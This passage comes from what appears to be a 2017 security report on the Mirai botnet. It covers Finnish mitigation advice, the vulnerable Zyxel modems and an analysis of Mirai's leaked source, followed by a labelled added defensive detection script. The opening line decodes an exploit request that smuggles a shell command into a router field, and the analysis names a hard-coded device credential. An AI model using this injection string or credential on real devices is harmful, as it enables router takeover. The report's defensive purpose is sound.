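    print(decode_post_body("ttcp_num=2&ttcp_ip=-h%20`%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%78%2E%73%68`"))
```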
Appendix: NCSC-FI's Mirai Mitigation
GUEST ARTICLE
Perttu Halonen, Information Security Specialist
Juhani Eronen, Chief Specialist

1.1 Mitigation Overview

FICORA and NCSC-FI have released a red alert concerning the botnet attack. Red alert means that the public is informed about the situation and immediate actions are needed. NCSC-FI advises users to reboot their devices if the device is included in the attached list. Rebooting the device removes the malware. The English translation of the alert is available at https://www.viestintavirasto.fi/en/cybersecurity/alerts/2016/varoitus-2016-04.html.

Prior to the red alert, NCSC-FI recommended Internet service providers (ISPs) and telecommunication operators to block TCP port 7547, which is the port where the vulnerable service (TR-064 and TR-069) exploited by Mirai's code is located. In some home router models, the service is found on port TCP 5555, but this port may have been utilized also by VPNs and other services, so blocking is not recommended. Some ISPs have nevertheless blocked TCP 5555.

Blocking port 7547 prevents the vulnerable devices from getting hijacked again using the same vulnerability until patches are released for the affected devices. ISPs generally plan to keep up the blocking for a month after the software patches have become available.

An unfortunate effect of blocking the scanning traffic is that some of the capability to monitor the extent of the epidemic is lost.

1.2 Payload information and malware sample

Unfortunately, NCSC-FI doesn't have samples of this piece of malware. However, discussions with ISPs hint that the malware seen in Finland is very similar or the same as reported in https://badcyber.com/new-mirai-attack-vector-bot-exploits-a-recently-discovered-router-vulnerability/.

1.3 Source address information

This Mirai variation uses worm techniques to spread itself autonomously.

Unfortunately, NCSC-FI doesn't have the capability to monitor Mirai's command and control traffic. The following is a list of known command and control server and malware download server addresses that NCSC-FI obtained from elsewhere, and forwarded to ISPs on 29 Nov 2016. NCSC-FI notes that the attributes have been enriched with pDNS results, so correlations could be misleading.

1.4 Impact on users

It is difficult for users to notice if their device has been infected with the malware. An affected device probably uses the capacity of the user's Internet connection for denial-of-service (DoS) attacks, for instance, without the user being aware of this. The malware may slow down the device or crash it.

The user of the Internet subscription is responsible for cleaning their infected devices. If necessary, a telecom operator may restrict outbound traffic to block malware traffic. Users are advised to follow any directions provided by telecom operators.

1.5 Background

Remote management of home routers that involves using open ports creates a vulnerability that can be abused to infect devices. Attackers can exploit this vulnerability to force infected devices to spread their infection to similar devices. Infected devices are integrated together to form a botnet. Botnets consisting of these infected devices can be used in various schemes, including launching DoS (denial-of-service) attacks. The remote management of infected devices generally uses TCP port 7547.

The scanning traffic caused by the recent infection wave began showing up on NCSC-FI's sensors on 25 November 2016 at 13:30 UTC. The growth of the scanning traffic was very aggressive. Prior to the recent infection wave, the daily number of devices infected with Mirai in Finland was only a few hundred. A day after the recent wave of infections began, the number had grown to around 16,000.

FICORA considers that, in this case, the legal conditions for filtering malicious traffic are fulfilled and recommends (but doesn't order) that telecom operators filter traffic to port TCP 7547 to prevent the exploitation of the vulnerability. Several telecom operators have started to filter traffic accordingly.

1.6 Vulnerable devices

At this stage, the following ADSL modems manufactured by Zyxel are known to be vulnerable.

Zyxel AMG1302-T10B - Software update available
Zyxel AMG1302-T11C - Software update available
Zyxel AMG1312-T10B - Software update available
Zyxel AMG1202-T10B (End-of-life) - Software update available
Zyxel P-660HN-T1A (End-of-life)
Zyxel P660HN-T1Av2 (End-of-life)

It is very likely that other devices are affected by the same vulnerability. The manufacturer Zyxel is aware of the issue.
Appendix: Mirai Source Code Analysis
Jarkko Turkulainen

MIRAI is the malicious code used in recent DDoS botnets. It's been linked with several high-profile attacks, such as the September 2016 attack on computer security journalist Brian Krebs' web site, an attack on French web host OVH, and the October 2016 Dyn cyber attack. Mirai is one of the few high-profile malware families that has its own dedicated Wikipedia page.

Mirai source overview
The Mirai bot is written in C language, and targets Linux embedded platforms (such as IoT devices). Recently, its source code was leaked - a copy of the source tree is on GitHub. The README in the source tree reveals some insight into why the code was leaked:

Greetz everybody,

When I first go in DDoS industry, I wasn't planning on staying in it long. I made my money, there's lots of eyes looking at IOT now, so it's time to GTFO. However, I know every skid and their mama, it's their wet dream to have something besides qbot.

So today, I have an amazing release for you. With Mirai, I usually pull max 380k bots from telnet alone. However, after the Kreb DDoS, ISPs been slowly shutting down and cleaning up their act. Today, max pull is about 300k bots, and dropping.

How big is Mirai?
What makes Mirai dangerous is the huge size of the potential installation base, and the fact that some of the devices are permanently vulnerable. According to some, more than 500 000 of Dahua Technology's chipset-based cameras are vulnerable to Mirai's attacks based on their use of fixed credentials root/xc3511 (see below). Furthermore, there are more credentials that have not been publicly analyzed yet, so the total number of permanently vulnerable devices connected to the Internet may be considerably larger.

As a C program, Mirai is very portable. In the source code repository, a precompiled set of bot binaries can be found for the following platforms:
./dlr/release/dlr.m68k (Motorola 68000 series)
./dlr/release/dlr.spc (Sparc processor architecture)
./dlr/release/dlr.mpsl (MIPS64 processor architecture)
./dlr/release/dlr.mips (MIPS processor architecture)
./dlr/release/dlr.arm7 (ARMv7 architecture)
./dlr/release/dlr.arm (ARM architecture)
./dlr/release/dlr.sh4 (Hitachi SuperH architecture)
./dlr/release/dlr.ppc (PowerPC architecture)

It should be noted that there is no x86-based architecture build in the repository, indicating that Mirai is targeted solely on the embedded/IoT devices. In the build script, however, there is the following line:
i686-gcc -Os -D BOT_ARCH=\"x86\" -D X32 -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.x86

The bot's command-and-control (CnC) is built with the Go language. The source code repository contains detailed instructions on how to build a bot infrastructure (including the CnC).

Scanning method
Infected devices brute-force random IP scans, and attempt Telnet access with precompiled sets of credentials. However, some IP ranges are excluded:
127.0.0.0/8 - Loopback
0.0.0.0/8 - Invalid address space
3.0.0.0/8 - General Electric Company
15.0.0.0/7 - Hewlett-Packard Company
56.0.0.0/8 - US Postal Service
6.0.0.0/8 - Department of Defense
7.0.0.0/8 - Department of Defense
11.0.0.0/8 - Department of Defense
22.0.0.0/8 - Department of Defense
26.0.0.0/8 - Department of Defense
28.0.0.0/8 - Department of Defense
29.0.0.0/8 - Department of Defense
30.0.0.0/8 - Department of Defense
33.0.0.0/8 - Department of Defense
55.0.0.0/8 - Department of Defense
214.0.0.0/8 - Department of Defense
215.0.0.0/8 - Department of Defense
10.0.0.0/8 - Internal network
192.168.0.0/16 - Internal network
172.16.0.0/14 - Internal network
100.64.0.0/10 - IANA NAT reserved
169.254.0.0/16 - IANA NAT reserved
198.18.0.0/15 - IANA Special use
224.*.*.*+ - Multicast
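Added example (not code from the report, FICORA, or the Mirai repository): defender-side detection logic for the two behaviours described in this section, Mirai-style Telnet scanning from infected devices and inbound TCP/7547 probing of the kind FICORA recommends operators filter. The flow records, log format, thresholds and customer network are constructed assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed flow records in a NetFlow-like text form (not from the report):
# timestamp proto src:sport dst:dport bytes
SAMPLE_FLOWS = """\
2016-11-28T10:00:01 TCP 203.0.113.10:51002 198.51.100.5:23 60
2016-11-28T10:00:01 TCP 203.0.113.10:51003 198.51.100.6:23 60
2016-11-28T10:00:02 TCP 203.0.113.10:51004 198.51.100.7:2323 60
2016-11-28T10:00:02 TCP 203.0.113.10:51005 192.0.2.44:23 60
2016-11-28T10:00:03 TCP 203.0.113.10:51006 192.0.2.45:23 60
2016-11-28T10:00:03 TCP 203.0.113.10:51007 192.0.2.46:23 60
2016-11-28T10:05:00 TCP 203.0.113.22:40100 198.51.100.5:23 4200
2016-11-28T10:06:00 TCP 198.51.100.99:33001 203.0.113.77:7547 120
2016-11-28T10:06:00 TCP 198.51.100.99:33002 203.0.113.78:7547 120
"""

TELNET_PORTS = {23, 2323}  # the ports Mirai's scanner targets

def parse_flows(text):
    """Yield (src, dst, dport, nbytes) tuples from the constructed log format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        _ts, _proto, src, dst, nbytes = line.split()
        dst_ip, dport = dst.rsplit(":", 1)
        yield src.rsplit(":", 1)[0], dst_ip, int(dport), int(nbytes)

def telnet_scanners(flows, min_targets=5, max_bytes=200):
    """Sources that made short Telnet attempts to many distinct hosts.
    Mirai hits random addresses with precompiled credential sets, so an
    infected device fans out to many destinations with little data per flow.
    A single long admin session (large byte count) is not counted."""
    targets = defaultdict(set)
    for src, dst, dport, nbytes in flows:
        if dport in TELNET_PORTS and nbytes <= max_bytes:
            targets[src].add(dst)
    return sorted(s for s, d in targets.items() if len(d) >= min_targets)

def port_7547_probes(flows, customer_net):
    """Sources probing TCP/7547 on customer addresses (the traffic FICORA
    recommends operators filter while the Zyxel modems are unpatched)."""
    net = ipaddress.ip_network(customer_net)
    return sorted({src for src, dst, dport, _ in flows
                   if dport == 7547 and ipaddress.ip_address(dst) in net})

if __name__ == "__main__":
    flows = list(parse_flows(SAMPLE_FLOWS))
    print("Telnet scanners:", telnet_scanners(flows))
    print("TCP/7547 probes:", port_7547_probes(flows, "203.0.113.0/24"))
```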
This report was brought to you by

F-Secure staff
Adam Pilkey, Alia Hilyati Ahmad Anuar, Andy Patel, Erka Koivunen, Frederic Fritz Vila, Henri Lindberg, Henri Nurmi, Jarkko Turkulainen, Jason Sattler, Karmina Aquino, Klas Kindström, Krzysztof Marciniak, Leszek Tasiemski, Melissa Michael, Mikael Albrecht, Mikko Hyppönen, Päivi Tynninen, Sean Sullivan, Siti Sarah Jamaludin, Tomi Tuominen

External contributors
Perttu Halonen, Juhani Eronen, Olaf Pursche, Martijn Grooten

WE SEE THINGS OTHERS DON'T

© 2017 F-Secure Corporation. All rights reserved. F-Secure and the F-logo are registered trademarks of F-Secure Corporation. F-Secure product and technology names and F-Secure logos are either trademarks or registered trademarks of F-Secure Corporation. Other product names and logos referenced herein are likely to be trademarks or registered trademarks of their respective owners.
Revision RTM 1.0
F-SECURE
State of Cyber Security 2017